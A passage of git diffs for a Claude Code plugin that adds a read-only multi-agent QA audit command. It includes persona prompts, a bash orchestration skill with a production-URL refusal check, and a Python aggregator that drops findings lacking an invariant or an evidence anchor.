+- You know every keyboard shortcut. You use Ctrl+R mid-flow, Ctrl+Z, Ctrl+Shift+T.
+- You spam-paste from clipboard. You drag-drop. You right-click everything.
+
+## Mission
+
+Audit the target for failures under high-input-velocity conditions. Specifically look for:
+
+- `idempotent_submit` — double-click on Submit / Pay / Save should not create duplicates.
+- `no_5xx` — does any endpoint 500 under 10k-char payloads?
+- `no_console_errors` — does pasting break the rendering?
+- `paraphrase_invariance` (API) — do semantically equivalent inputs return equivalent outputs?
+- `undo_redo_identity` — does Ctrl+Z then Ctrl+Y leave state identical?
+- `idempotent_get` — does GET on the same resource twice produce identical responses?
+
+## Budget
+
+- `max_actions: 200`
+- `max_clock_seconds: 300`
+
+## Output
+
+Same canonical reviewer YAML contract: `verdict: AUDITED | findings | confidence`. Every finding requires `invariant_violated` + evidence anchor (screenshot OR network_request OR repro_steps). See `testers-panicked-grandma.md` for the full schema; do not reinvent.
+
+## Rules
+
+- **Read-only.** No `Edit`, no general `Write`. Your `allowed-tools` whitelist is your ceiling.
+- **Evidence required.** Drop unanchored findings.
+- **No invariant, no finding** — downgrade to `severity: suggestion`.
+- **No early-stop.** Run to budget.
+- **Anti-loop:** 3× same action → pivot.

--- a/plugins/uberdev/agents/testers-power-user.md
+++ b/plugins/uberdev/agents/testers-power-user.md
@@ -32,9 +32,32 @@ Audit the target for failures under high-input-velocity conditions. Specifically
 - `max_actions: 200`
 - `max_clock_seconds: 300`
 
-## Output
+## Output (canonical reviewer YAML contract)
 
-Same canonical reviewer YAML contract: `verdict: AUDITED | findings | confidence`. Every finding requires `invariant_violated` + evidence anchor (screenshot OR network_request OR repro_steps). See `testers-panicked-grandma.md` for the full schema; do not reinvent.
+```yaml
+verdict: AUDITED
+findings:
+  - severity: blocker | critical | major | important | suggestion
+    persona: power_user
+    location: <url-or-selector-or-endpoint>
+    invariant_violated: <one of the invariant IDs above>
+    summary: <1-line>
+    detail: <prose>
+    evidence:
+      screenshot: <path or null>
+      dom_hash: <sha256 or null>
+      network_request:
+        method: <verb or null>
+        url: <url or null>
+        status: <code or null>
+      repro_steps: [<step>, ...]
+      observed: <what happened>
+      expected: <what should have happened per invariant>
+    confidence: low | medium | high
+confidence: low | medium | high
+```
+
+Every finding requires `invariant_violated` + at least one evidence anchor (screenshot OR network_request OR repro_steps). The aggregator drops unanchored findings.
 
 ## Rules
 

--- a/plugins/uberdev/commands/install-aliases.md
+++ b/plugins/uberdev/commands/install-aliases.md
@@ -1,5 +1,5 @@
 ---
-description: "Install short-form aliases (/issue, /solve, /turbo, /simplify, /review-pr, /merge, /dev) as one-way forwarders to /uberdev:<command>"
+description: "Install short-form aliases (/issue, /solve, /turbo, /simplify, /review-pr, /merge, /dev, /testers) as one-way forwarders to /uberdev:<command>"
 argument-hint: "[--force] [--dry-run]"
 allowed-tools: ["Bash", "Read"]
 ---
@@ -14,7 +14,7 @@ field for top-level aliases, so the only mechanism is shipping forwarder
 files into the user's standalone `~/.claude/commands/` directory (where
 filename = command name, no plugin prefix). See issue #16.
 
-This command writes seven such forwarders. Each is **one-way** — it points
+This command writes eight such forwarders. Each is **one-way** — it points
 at the canonical `/uberdev:<command>` rather than duplicating its body.
 Existing `/uberdev:<command>` invocations are unaffected; this is purely
 additive ergonomics.
@@ -30,6 +30,7 @@ additive ergonomics.
 | `/review-pr` | `/uberdev:review-pr` |
 | `/merge`     | `/uberdev:merge` |
 | `/dev`       | `/uberdev:dev` |
+| `/testers`   | `/uberdev:testers` |
 
 Note `/review-pr` rather than `/review`: `/review` is a built-in
 Claude Code command, and the issue's collision rule is "plugin namespacing

--- a/plugins/uberdev/commands/testers.md
+++ b/plugins/uberdev/commands/testers.md
@@ -1,0 +1,24 @@
+---
+description: "Read-only adversarial QA audit squad. Spawns 8 agents (6 personas + 2 monitors) over 3 coordinated waves against an auto-detected target (web/api/native/all). Findings are evidence-anchored against a 10-invariant oracle library and auto-filed as GitHub issues via findings-to-issues. The squad never writes app code."
+argument-hint: "[<target>] [--target=web|api|native|all] [--watch] [--rounds=N] [--max-issues=N] [--persona=name,...] [--no-issues] [--rps-cap=N]"
+allowed-tools: ["Bash", "Read", "Write", "Task"]
+---
+
+# Testers — Adversarial QA Audit Squad
+
+Spawn an 8-agent read-only QA audit squad against the target in **$ARGUMENTS** (or auto-detect from CWD). Six distinct-persona testers (`panicked_grandma`, `power_user`, `adversarial_security`, `chaos_engineer`, `a11y_critic`, `mobile_thumb`) + two monitors (`monitor_primary`, `monitor_devils_advocate`) run three coordinated waves; monitors generate per-persona follow-up prompts between waves; findings without an `invariant_violated` field and an evidence anchor are dropped. Findings flow into `findings-to-issues` for durable GitHub-issue persistence.
+
+**Usage:** `/uberdev:testers [<target>] [--target=...] [--watch] [--rounds=N] [--max-issues=N] [--persona=name,...] [--no-issues] [--rps-cap=N]`
+
+- `<target>` — optional URL / OpenAPI path / binary path; auto-detect from CWD if omitted.
+- `--target=<surface>` — explicit surface (`web | api | native | all`); overrides auto-detect.
+- `--watch` — run the master inline in this session with non-headless browsers, instead of backgrounding via the dispatch backend.
+- `--rounds=N` — wave count (default 3; minimum 1).
+- `--max-issues=N` — cap for `findings-to-issues` (default 10).
+- `--persona=name,...` — override default roster (drop a custom persona at `plugins/uberdev/agents/testers-<name>.md`).
+- `--no-issues` — skip `findings-to-issues`; report only.
+- `--rps-cap=N` — API stress ceiling (default 10).
+
+**Read-only contract:** the squad has no `Edit` or general `Write` on app code; agent `allowed-tools` whitelists enforce it at the tool boundary.
+
+Now invoke the `uberdev:testers-pipeline` skill — it owns the 6-phase pipeline (parse + auto-detect, dispatch master, three waves, report synthesis, findings persistence, summary). The skill renders inline, so `$ARGUMENTS` remains in scope.

--- a/plugins/uberdev/commands/uninstall-aliases.md
+++ b/plugins/uberdev/commands/uninstall-aliases.md
@@ -1,5 +1,5 @@
 ---
-description: "Remove short-form aliases (/issue, /solve, /turbo, /simplify, /review-pr, /merge, /dev) installed by /uberdev:install-aliases"
+description: "Remove short-form aliases (/issue, /solve, /turbo, /simplify, /review-pr, /merge, /dev, /testers) installed by /uberdev:install-aliases"
 argument-hint: "[--dry-run]"
 allowed-tools: ["Bash"]
 ---
@@ -24,7 +24,7 @@ DRY_RUN=0
 [[ " $ARGUMENTS " == *" --dry-run "* ]] && DRY_RUN=1
 
 DEST_DIR="$HOME/.claude/commands"
-SHORTS='issue solve turbo simplify review-pr merge dev'
+SHORTS='issue solve turbo simplify review-pr merge dev testers'
 
 REMOVED=0
 KEPT=0

--- a/plugins/uberdev/lib/aliases-sync.sh
+++ b/plugins/uberdev/lib/aliases-sync.sh
@@ -30,7 +30,8 @@ turbo|turbo|["Bash", "Read", "Task"]
 simplify|simplify|["Bash", "Edit", "Glob", "Grep", "MultiEdit", "Read", "Task", "Write"]
 review-pr|review-pr|["Bash(git*)", "Bash(gh*)", "Edit", "Glob", "Grep", "MultiEdit", "Read", "Task", "Write"]
 merge|merge|["Bash", "Glob", "Grep", "Read", "Task"]
-dev|dev|["Bash", "Read", "Edit", "Write", "Task"]'
+dev|dev|["Bash", "Read", "Edit", "Write", "Task"]
+testers|testers|["Bash", "Read", "Write", "Task"]'
 
 # Built-in Claude Code commands; never overwrite these.
 BUILTINS='init review security-review statusline-setup help clear plugin'

--- a/plugins/uberdev/skills/testers-pipeline/SKILL.md
+++ b/plugins/uberdev/skills/testers-pipeline/SKILL.md
@@ -74,4 +74,137 @@ Re-uses the existing `findings-to-issues` aggregate shape (see `agents/findings-
 
 None. This skill is fully self-contained.
 
+
+## Phase 0 — Parse + auto-detect target
+
+The skill is invoked with `$ARGUMENTS` in scope from `commands/testers.md`. Parse the following flags (Bash substring matching is fine; this isn't getopt-grade):
+
+```bash
+RUN_ID="$(date +%Y%m%d-%H%M%S)-$(printf '%04x' $RANDOM)"
+RUN_DIR=".uberdev/research/$RUN_ID/testers"
+mkdir -p "$RUN_DIR/scratch" "$RUN_DIR/screenshots" "$RUN_DIR/traces"
+
+# Parse flags
+TARGET=""; SURFACE="auto"; WATCH=0; ROUNDS=3; MAX_ISSUES=10; PERSONA_LIST=""; NO_ISSUES=0; RPS_CAP=10
+for arg in $ARGUMENTS; do
+  case "$arg" in
+    --watch) WATCH=1 ;;
+    --no-issues) NO_ISSUES=1 ;;
+    --target=*) SURFACE="${arg#--target=}" ;;
+    --rounds=*) ROUNDS="${arg#--rounds=}" ;;
+    --max-issues=*) MAX_ISSUES="${arg#--max-issues=}" ;;
+    --persona=*) PERSONA_LIST="${arg#--persona=}" ;;
+    --rps-cap=*) RPS_CAP="${arg#--rps-cap=}" ;;
+    --*) echo "warning: unknown flag $arg" >&2 ;;
+    *) TARGET="$arg" ;;
+  esac
+done
+
+# Auto-detect surface if needed
+if [ "$SURFACE" = "auto" ]; then
+  if [ -f package.json ] && grep -q '"playwright"' package.json; then SURFACE="web"
+  elif find . -maxdepth 3 -name "openapi.yaml" -o -name "openapi.json" -o -name "swagger.yaml" 2>/dev/null | head -1 | read -r _; then SURFACE="api"
+  elif [ -f electron-builder.json ] || ( [ -f Cargo.toml ] && grep -q tauri Cargo.toml ); then SURFACE="native"
+  elif [ -d app ] || [ -d pages ] || [ -f next.config.js ] || [ -f wrangler.toml ]; then SURFACE="web"
+  else SURFACE="all"
+  fi
+fi
+
+# Refuse if target matches prod patterns
+if [ -f .uberdev/config.yaml ]; then
+  PROD_PATTERNS="$(python3 -c "import yaml; cfg=yaml.safe_load(open('.uberdev/config.yaml')); print('\n'.join(cfg.get('prod_url_patterns', [])))" 2>/dev/null || true)"
+  if [ -n "$PROD_PATTERNS" ] && [ -n "$TARGET" ]; then
+    while IFS= read -r pat; do
+      if echo "$TARGET" | grep -qE "$pat"; then
+        echo "error: target '$TARGET' matches prod_url_pattern '$pat' — refusing to run" >&2; exit 2
+      fi
+    done <<< "$PROD_PATTERNS"
+  fi
+fi
+```
+
+## Phase 1 — Dispatch master (or run inline)
+
+If `--watch` is set, the skill continues in the current session (the wave loop below runs inline). Otherwise, dispatch a master via `plugins/uberdev/lib/dispatch.sh`:
+
+```bash
+if [ "$WATCH" = "1" ]; then
+  echo "[testers] running inline (--watch); session occupied for the duration."
+else
+  # Build the master prompt that re-enters this skill with the same args plus --watch
+  MASTER_PROMPT="/uberdev:testers $ARGUMENTS --watch"
+  source plugins/uberdev/lib/dispatch.sh
+  dispatch_master "$MASTER_PROMPT" "$RUN_DIR/master.log"
+  echo "[testers] dispatched master. Watch progress: $RUN_DIR/master.log"
+  echo "[testers] run_id=$RUN_ID surface=$SURFACE target=$TARGET"
+  exit 0
+fi
+```
+
+## Phase 2–4 — Three coordinated waves
+
+Wave loop. For each round in `1..ROUNDS`:
+
+```bash
+PERSONAS="${PERSONA_LIST:-panicked-grandma,power-user,adversarial-security,chaos-engineer,a11y-critic,mobile-thumb}"
+PREV_FINDINGS="null"
+
+for WAVE in $(seq 1 "$ROUNDS"); do
+  WAVE_FILE="$RUN_DIR/wave-$WAVE.yaml"
+  echo "[testers] wave $WAVE/$ROUNDS starting"
+
+  # In ONE assistant message, dispatch all 6 personas + 2 monitors via Task() calls.
+  # The skill emits the dispatch directives below; the wrapping orchestrator (this Claude
+  # session) reads them and fires the actual Task() calls in a single message.
+  cat > "$RUN_DIR/dispatch-wave-$WAVE.yaml" <<EOF
+schema_version: 1
+wave: $WAVE
+run_id: $RUN_ID
+target:
+  surface: $SURFACE
+  url: $TARGET
+prev_findings_path: $PREV_FINDINGS
+budget:
+  max_actions: 200
+  max_clock_seconds: 300
+  rps_cap: $RPS_CAP
+agents_to_dispatch:
+  personas: [$PERSONAS]
+  monitors: [monitor-primary, monitor-devils-advocate]
+EOF
+
+  # ============================================================================
+  # DISPATCH POINT — the orchestrating session reads dispatch-wave-N.yaml above
+  # and fires N Task() calls IN A SINGLE assistant message. Each Task receives:
+  #   - target spec
+  #   - invariants.yaml (path)
+  #   - prev wave's findings (path or null)
+  #   - monitor-primary's follow_ups for this persona (from prev wave; empty on wave 1)
+  #   - scratch dir scoped to .uberdev/research/$RUN_ID/testers/scratch/<agent>/
+  # Each Task returns the canonical reviewer YAML on stdout.
+  # ============================================================================
+
+  # After all Task() returns, aggregate to wave-N.yaml:
+  python3 plugins/uberdev/skills/testers-pipeline/aggregate.py \
+    --run-id "$RUN_ID" \
+    --wave "$WAVE" \
+    --scratch-dir "$RUN_DIR/scratch" \
+    --invariants plugins/uberdev/skills/testers-pipeline/invariants.yaml \
+    --out "$WAVE_FILE"
+
+  PREV_FINDINGS="$WAVE_FILE"
+  echo "[testers] wave $WAVE complete: $(yq '.findings | length' "$WAVE_FILE") findings"
+done
+```
+
+The skill ships `aggregate.py` alongside SKILL.md — a tiny script (~50 lines) that:
+
+1. Globs `scratch/<agent>/*.yaml`
+2. Parses each via `yaml.safe_load`
+3. Drops findings without `invariant_violated` OR without any `evidence.*` populated
+4. Computes stable `id` per finding via `sha256(persona + invariant_violated + location)[:16]`
+5. Merges all findings into one wave-N.yaml
+6. Runs monitor-primary's cross_refs logic IF the monitor agents' outputs are in scratch (else passes them through verbatim)
+
+<!-- Phase 5 (findings-to-issues + report.md synthesis) lands via T17. -->
 <!-- Phase logic implementations land via T15 (waves 2-4) and T17 (Phase 5). -->

--- a/plugins/uberdev/skills/testers-pipeline/SKILL.md
+++ b/plugins/uberdev/skills/testers-pipeline/SKILL.md
@@ -146,8 +146,17 @@ fi
 Wave loop. For each round in `1..ROUNDS`:
 
 ```bash
-PERSONAS="${PERSONA_LIST:-panicked-grandma,power-user,adversarial-security,chaos-engineer,a11y-critic,mobile-thumb}"
+PERSONAS="${PERSONA_LIST:-panicked_grandma,power_user,adversarial_security,chaos_engineer,a11y_critic,mobile_thumb}"
 PREV_FINDINGS="null"
+
+# Per-wave fan-out cap (RFC 0006 §Risks). Default 8 matches wave size.
+# Precedence env > config > default; range [1, 16].
+if [ -r "${CLAUDE_PLUGIN_ROOT}/lib/config-read.sh" ]; then
+  . "${CLAUDE_PLUGIN_ROOT}/lib/config-read.sh"
+  TESTERS_FANOUT="$(uberdev_read_int_in_range fanout_concurrency.testers UBERDEV_TESTERS_FANOUT 1 16 8)"
+else
+  TESTERS_FANOUT=8
+fi
 
 for WAVE in $(seq 1 "$ROUNDS"); do
   WAVE_FILE="$RUN_DIR/wave-$WAVE.yaml"
@@ -170,7 +179,7 @@ budget:
   rps_cap: $RPS_CAP
 agents_to_dispatch:
   personas: [$PERSONAS]
-  monitors: [monitor-primary, monitor-devils-advocate]
+  monitors: [monitor_primary, monitor_devils_advocate]
 EOF
 
   # ============================================================================
@@ -193,7 +202,7 @@ EOF
     --out "$WAVE_FILE"
 
   PREV_FINDINGS="$WAVE_FILE"
-  echo "[testers] wave $WAVE complete: $(yq '.findings | length' "$WAVE_FILE") findings"
+  echo "[testers] wave $WAVE complete: $(python3 -c "import sys,yaml; print(len((yaml.safe_load(open(sys.argv[1])) or {}).get('findings') or []))" "$WAVE_FILE") findings"
 done
 ```
 

--- a/plugins/uberdev/skills/testers-pipeline/SKILL.md
+++ b/plugins/uberdev/skills/testers-pipeline/SKILL.md
@@ -153,6 +153,24 @@ fi
 Wave loop. For each round in `1..ROUNDS`:
 
 ```bash
+# Wave-file stat helper. Reads a wave-N.yaml and prints the requested count.
+# Centralises the python3-yaml invocation so per-wave summary lines and
+# Phase 6 share one parser instead of three inlined snippets.
+_wave_count() {
+  # _wave_count <path> <kind>  where kind ∈ {findings, verified}
+  python3 - "$1" "$2" <<'PY'
+import sys, yaml
+path, kind = sys.argv[1], sys.argv[2]
+doc = yaml.safe_load(open(path)) or {}
+if kind == "findings":
+    print(len(doc.get("findings") or []))
+elif kind == "verified":
+    print(sum(1 for cr in (doc.get("cross_refs") or []) if cr.get("verified")))
+else:
+    sys.exit(f"unknown kind: {kind}")
+PY
+}
+
 PERSONAS="${PERSONA_LIST:-panicked_grandma,power_user,adversarial_security,chaos_engineer,a11y_critic,mobile_thumb}"
 PREV_FINDINGS="null"
 
@@ -209,7 +227,7 @@ EOF
     --out "$WAVE_FILE"
 
   PREV_FINDINGS="$WAVE_FILE"
-  echo "[testers] wave $WAVE complete: $(python3 -c "import sys,yaml; print(len((yaml.safe_load(open(sys.argv[1])) or {}).get('findings') or []))" "$WAVE_FILE") findings"
+  echo "[testers] wave $WAVE complete: $(_wave_count "$WAVE_FILE" findings) findings"
 done
 ```
 
@@ -255,8 +273,8 @@ The findings-to-issues aggregate is shaped to match the existing post-impl-revie
 ## Phase 6 — Summary + exit
 
 ```bash
-TOTAL="$(python3 -c "import yaml; f=yaml.safe_load(open('$RUN_DIR/wave-$ROUNDS.yaml')); print(len(f['findings']))")"
-VERIFIED="$(python3 -c "import yaml; f=yaml.safe_load(open('$RUN_DIR/wave-$ROUNDS.yaml')); print(sum(1 for cr in (f.get('cross_refs') or []) if cr.get('verified')))")"
+TOTAL="$(_wave_count "$RUN_DIR/wave-$ROUNDS.yaml" findings)"
+VERIFIED="$(_wave_count "$RUN_DIR/wave-$ROUNDS.yaml" verified)"
 
 echo
 echo "[testers] === DONE ==="

--- a/plugins/uberdev/skills/testers-pipeline/SKILL.md
+++ b/plugins/uberdev/skills/testers-pipeline/SKILL.md
@@ -206,5 +206,51 @@ The skill ships `aggregate.py` alongside SKILL.md — a tiny script (~50 lines) 
 5. Merges all findings into one wave-N.yaml
 6. Runs monitor-primary's cross_refs logic IF the monitor agents' outputs are in scratch (else passes them through verbatim)
 
-<!-- Phase 5 (findings-to-issues + report.md synthesis) lands via T17. -->
+
+## Phase 5 — Synthesize report.md and persist findings
+
+```bash
+# Generate the human-readable report
+python3 plugins/uberdev/skills/testers-pipeline/report.py \
+  --run-id "$RUN_ID" \
+  --waves-dir "$RUN_DIR" \
+  --invariants plugins/uberdev/skills/testers-pipeline/invariants.yaml \
+  --out "$RUN_DIR/report.md"
+
+echo "[testers] report written: $RUN_DIR/report.md"
+
+# Dispatch findings-to-issues unless --no-issues
+if [ "$NO_ISSUES" != "1" ]; then
+  # Build a findings-to-issues-compatible aggregate from the final wave file.
+  # Only verified: true findings with severity blocker|critical|major are filed.
+  python3 plugins/uberdev/skills/testers-pipeline/report.py \
+    --run-id "$RUN_ID" \
+    --waves-dir "$RUN_DIR" \
+    --invariants plugins/uberdev/skills/testers-pipeline/invariants.yaml \
+    --emit-findings-to-issues-aggregate "$RUN_DIR/findings-to-issues-aggregate.md"
+
+  # The Task() dispatch happens in the orchestrating session, not in this skill.
+  echo "DISPATCH: findings-to-issues with $RUN_DIR/findings-to-issues-aggregate.md (max_new=$MAX_ISSUES)"
+fi
+```
+
+The findings-to-issues aggregate is shaped to match the existing post-impl-review-final.md schema (see `agents/findings-to-issues.md`). The orchestrator session reads the `DISPATCH:` line and fires `Task(subagent_type: uberdev:findings-to-issues)` in the standard idiom.
+
+## Phase 6 — Summary + exit
+
+```bash
+TOTAL="$(python3 -c "import yaml; f=yaml.safe_load(open('$RUN_DIR/wave-$ROUNDS.yaml')); print(len(f['findings']))")"
+VERIFIED="$(python3 -c "import yaml; f=yaml.safe_load(open('$RUN_DIR/wave-$ROUNDS.yaml')); print(sum(1 for cr in (f.get('cross_refs') or []) if cr.get('verified')))")"
+
+echo
+echo "[testers] === DONE ==="
+echo "  run_id:        $RUN_ID"
+echo "  surface:       $SURFACE"
+echo "  target:        ${TARGET:-(auto)}"
+echo "  rounds:        $ROUNDS"
+echo "  total findings:    $TOTAL"
+echo "  verified findings: $VERIFIED"
+echo "  report:        $RUN_DIR/report.md"
+[ "$NO_ISSUES" != "1" ] && echo "  issues:        see findings-to-issues output above"
+```
 <!-- Phase logic implementations land via T15 (waves 2-4) and T17 (Phase 5). -->

--- a/plugins/uberdev/skills/testers-pipeline/SKILL.md
+++ b/plugins/uberdev/skills/testers-pipeline/SKILL.md
@@ -80,6 +80,13 @@ None. This skill is fully self-contained.
 The skill is invoked with `$ARGUMENTS` in scope from `commands/testers.md`. Parse the following flags (Bash substring matching is fine; this isn't getopt-grade):
 
 ```bash
+# Phase 0 precheck — PyYAML is the only runtime dep beyond python3 + bash.
+# aggregate.py and report.py both import yaml; fail fast if it's missing.
+if ! python3 -c "import yaml" 2>/dev/null; then
+  echo "error: PyYAML required (pip install pyyaml or python3 -m pip install pyyaml)" >&2
+  exit 2
+fi
+
 RUN_ID="$(date +%Y%m%d-%H%M%S)-$(printf '%04x' $RANDOM)"
 RUN_DIR=".uberdev/research/$RUN_ID/testers"
 mkdir -p "$RUN_DIR/scratch" "$RUN_DIR/screenshots" "$RUN_DIR/traces"

--- a/plugins/uberdev/skills/testers-pipeline/SKILL.md
+++ b/plugins/uberdev/skills/testers-pipeline/SKILL.md
@@ -1,0 +1,77 @@
+---
+name: testers-pipeline
+description: Use when /uberdev:testers is invoked. Orchestrates a read-only 8-agent adversarial QA audit squad (6 personas + 2 monitors) across 3 coordinated waves against a web/api/native target; routes findings into findings-to-issues.
+model: opus
+---
+
+# Testers Pipeline
+
+Owns the lifecycle of `/uberdev:testers`. Read-only audit — the squad never writes app code. Findings are evidence-anchored and gated through monitors before being filed as GitHub issues.
+
+## Phases
+
+- **Phase 0 — Parse + auto-detect target**
+- **Phase 1 — Dispatch master agent (or run inline if --watch)**
+- **Phase 2 — Wave 1 (fresh eyes): 8-agent parallel Task() fan-out**
+- **Phase 3 — Wave 2 (verify + dig): monitor follow-ups → re-dispatch 8 agents**
+- **Phase 4 — Wave 3 (final cross-confirmation): adversarial monitor pass**
+- **Phase 5 — Synthesize report.md + dispatch findings-to-issues**
+- **Phase 6 — Emit summary line and exit**
+
+## Schemas
+
+### `wave-N.yaml` — aggregated per-wave findings
+
+Written to `.uberdev/research/$RUN_ID/testers/wave-<N>.yaml` after each wave.
+
+```yaml
+schema_version: 1
+wave: 1 | 2 | 3
+run_id: <ulid>
+target:
+  surface: web | api | native | all
+  url: <url-or-binary-path>
+agents_dispatched: [panicked_grandma, power_user, adversarial_security, chaos_engineer, a11y_critic, mobile_thumb, monitor_primary, monitor_devils_advocate]
+findings:
+  - id: <stable-id>             # sha256(persona + invariant + location)[:16]
+    severity: blocker | critical | major | important | suggestion
+    persona: <one-of-agents>
+    location: <url-or-endpoint-or-selector>
+    invariant_violated: <id-from-invariants.yaml>
+    summary: <1-line>
+    detail: <prose>
+    evidence:
+      screenshot: <path-or-null>
+      dom_hash: <sha256-or-null>
+      network_request:
+        method: <verb-or-null>
+        url: <url-or-null>
+        status: <code-or-null>
+      repro_steps: [<step>, ...]
+      observed: <text>
+      expected: <text>
+    confidence: low | medium | high
+cross_refs:
+  - finding_id: <id>
+    reproduced_by: [<persona>, <persona>]
+    verified: true | false
+follow_ups_for_next_wave:                 # populated by monitor-primary, empty on wave 3
+  <persona-name>:
+    - <natural-language-prompt>
+```
+
+### `findings-to-issues` aggregate (Phase 5 output)
+
+Re-uses the existing `findings-to-issues` aggregate shape (see `agents/findings-to-issues.md` for the canonical schema). Severity mapping: `blocker → BLOCKER`, `critical → CRITICAL`, `major → MAJOR`. Only `verified: true` findings are filed.
+
+## Reuses
+
+- `lib/dispatch.sh` — master backgrounding (RFC 0004)
+- `agents/findings-to-issues.md` — durable persistence (HTML-comment fingerprint dedupe, MAX_NEW=10 cap)
+- Reviewer YAML contract — `verdict: AUDITED | findings | confidence` shape
+
+## Sub-skill imports
+
+None. This skill is fully self-contained.
+
+<!-- Phase logic implementations land via T15 (waves 2-4) and T17 (Phase 5). -->

--- a/plugins/uberdev/skills/testers-pipeline/aggregate.py
+++ b/plugins/uberdev/skills/testers-pipeline/aggregate.py
@@ -19,9 +19,17 @@ def stable_id(persona: str, invariant: str, location: str) -> str:
     return hashlib.sha256(f"{persona}::{invariant}::{location}".encode()).hexdigest()[:16]
 
 
-def has_evidence(ev: dict) -> bool:
-    if not isinstance(ev, dict):
+def has_evidence(ev) -> bool:
+    # Explicit type guard: a persona returning evidence as a string or list
+    # (instead of the documented dict shape) is a schema violation, not a
+    # silent miss. Raise so the aggregator surfaces the bad input rather
+    # than dropping the finding without a trace.
+    if ev is None:
         return False
+    if not isinstance(ev, dict):
+        raise ValueError(
+            f"evidence must be a dict per SKILL.md schema; got {type(ev).__name__}"
+        )
     if ev.get("screenshot") or ev.get("dom_hash"):
         return True
     nr = ev.get("network_request") or {}
@@ -29,6 +37,38 @@ def has_evidence(ev: dict) -> bool:
         return True
     rs = ev.get("repro_steps") or []
     return isinstance(rs, list) and len(rs) > 0
+
+
+def load_invariants(path: str) -> set:
+    """Load the invariant-ID set from an invariants.yaml. Fails loud on any
+    I/O, parse, or schema problem so a misconfigured run does not silently
+    drop every finding."""
+    try:
+        with open(path) as fh:
+            doc = yaml.safe_load(fh)
+    except FileNotFoundError:
+        print(f"error: invariants file not found: {path}", file=sys.stderr)
+        sys.exit(2)
+    except PermissionError as e:
+        print(f"error: cannot read invariants file {path}: {e}", file=sys.stderr)
+        sys.exit(2)
+    except yaml.YAMLError as e:
+        print(f"error: malformed invariants YAML {path}: {e}", file=sys.stderr)
+        sys.exit(2)
+    if not isinstance(doc, dict) or not isinstance(doc.get("invariants"), list):
+        print(
+            f"error: invariants file {path} missing top-level 'invariants:' list",
+            file=sys.stderr,
+        )
+        sys.exit(2)
+    try:
+        return {i["id"] for i in doc["invariants"]}
+    except (KeyError, TypeError) as e:
+        print(
+            f"error: invariants file {path} has entries without an 'id' field: {e}",
+            file=sys.stderr,
+        )
+        sys.exit(2)
 
 
 def main() -> int:
@@ -40,7 +80,7 @@ def main() -> int:
     p.add_argument("--out", required=True)
     args = p.parse_args()
 
-    invariants = {i["id"] for i in yaml.safe_load(open(args.invariants))["invariants"]}
+    invariants = load_invariants(args.invariants)
 
     findings = []
     cross_refs_in = []

--- a/plugins/uberdev/skills/testers-pipeline/aggregate.py
+++ b/plugins/uberdev/skills/testers-pipeline/aggregate.py
@@ -89,7 +89,8 @@ def main() -> int:
 
     for path in sorted(glob.glob(os.path.join(args.scratch_dir, "*/*.yaml"))):
         try:
-            doc = yaml.safe_load(open(path)) or {}
+            with open(path) as fh:
+                doc = yaml.safe_load(fh) or {}
         except yaml.YAMLError as e:
             print(f"warning: skipping malformed {path}: {e}", file=sys.stderr)
             continue
@@ -119,7 +120,8 @@ def main() -> int:
         "follow_ups_for_next_wave": follow_ups,
         "dispositions": dispositions,
     }
-    yaml.safe_dump(out, open(args.out, "w"), default_flow_style=False, sort_keys=False)
+    with open(args.out, "w") as fh:
+        yaml.safe_dump(out, fh, default_flow_style=False, sort_keys=False)
     print(f"aggregated {len(findings)} findings into {args.out}", file=sys.stderr)
     return 0
 

--- a/plugins/uberdev/skills/testers-pipeline/aggregate.py
+++ b/plugins/uberdev/skills/testers-pipeline/aggregate.py
@@ -1,0 +1,88 @@
+#!/usr/bin/env python3
+"""Aggregate per-agent YAML outputs in a scratch dir into wave-N.yaml.
+
+Run:
+    aggregate.py --run-id <id> --wave <N> --scratch-dir <path>
+                 --invariants <path> --out <path>
+
+Drops findings without invariant_violated or without any evidence anchor.
+"""
+import argparse
+import glob
+import hashlib
+import os
+import sys
+import yaml
+
+
+def stable_id(persona: str, invariant: str, location: str) -> str:
+    return hashlib.sha256(f"{persona}::{invariant}::{location}".encode()).hexdigest()[:16]
+
+
+def has_evidence(ev: dict) -> bool:
+    if not isinstance(ev, dict):
+        return False
+    if ev.get("screenshot") or ev.get("dom_hash"):
+        return True
+    nr = ev.get("network_request") or {}
+    if isinstance(nr, dict) and nr.get("url"):
+        return True
+    rs = ev.get("repro_steps") or []
+    return isinstance(rs, list) and len(rs) > 0
+
+
+def main() -> int:
+    p = argparse.ArgumentParser()
+    p.add_argument("--run-id", required=True)
+    p.add_argument("--wave", required=True, type=int)
+    p.add_argument("--scratch-dir", required=True)
+    p.add_argument("--invariants", required=True)
+    p.add_argument("--out", required=True)
+    args = p.parse_args()
+
+    invariants = {i["id"] for i in yaml.safe_load(open(args.invariants))["invariants"]}
+
+    findings = []
+    cross_refs_in = []
+    follow_ups = {}
+    dispositions = []
+
+    for path in sorted(glob.glob(os.path.join(args.scratch_dir, "*/*.yaml"))):
+        try:
+            doc = yaml.safe_load(open(path)) or {}
+        except yaml.YAMLError as e:
+            print(f"warning: skipping malformed {path}: {e}", file=sys.stderr)
+            continue
+        for f in doc.get("findings") or []:
+            inv = f.get("invariant_violated")
+            if inv not in invariants:
+                continue
+            if not has_evidence(f.get("evidence") or {}):
+                continue
+            persona = f.get("persona") or "unknown"
+            location = f.get("location") or ""
+            f["id"] = stable_id(persona, inv, location)
+            findings.append(f)
+        for cr in doc.get("cross_refs") or []:
+            cross_refs_in.append(cr)
+        for k, v in (doc.get("follow_ups_for_next_wave") or {}).items():
+            follow_ups.setdefault(k, []).extend(v or [])
+        for d in doc.get("dispositions") or []:
+            dispositions.append(d)
+
+    out = {
+        "schema_version": 1,
+        "wave": args.wave,
+        "run_id": args.run_id,
+        "findings": findings,
+        "cross_refs": cross_refs_in,
+        "follow_ups_for_next_wave": follow_ups,
+        "dispositions": dispositions,
+    }
+    yaml.safe_dump(out, open(args.out, "w"), default_flow_style=False, sort_keys=False)
+    print(f"aggregated {len(findings)} findings into {args.out}", file=sys.stderr)
+    return 0
+
+
+if __name__ == "__main__":
+    sys.exit(main())

--- a/plugins/uberdev/skills/testers-pipeline/invariants.yaml
+++ b/plugins/uberdev/skills/testers-pipeline/invariants.yaml
@@ -1,0 +1,51 @@
+schema_version: 1
+invariants:
+  - id: no_5xx
+    desc: No 5xx response under normal user flow
+    applies_to: [web, api]
+    severity_default: critical
+
+  - id: no_console_errors
+    desc: No console.error in browser console during a normal flow
+    applies_to: [web]
+    severity_default: major
+
+  - id: idempotent_submit
+    desc: Double-click submit produces same outcome, not duplicate
+    applies_to: [web, api]
+    severity_default: critical
+
+  - id: auth_isolation
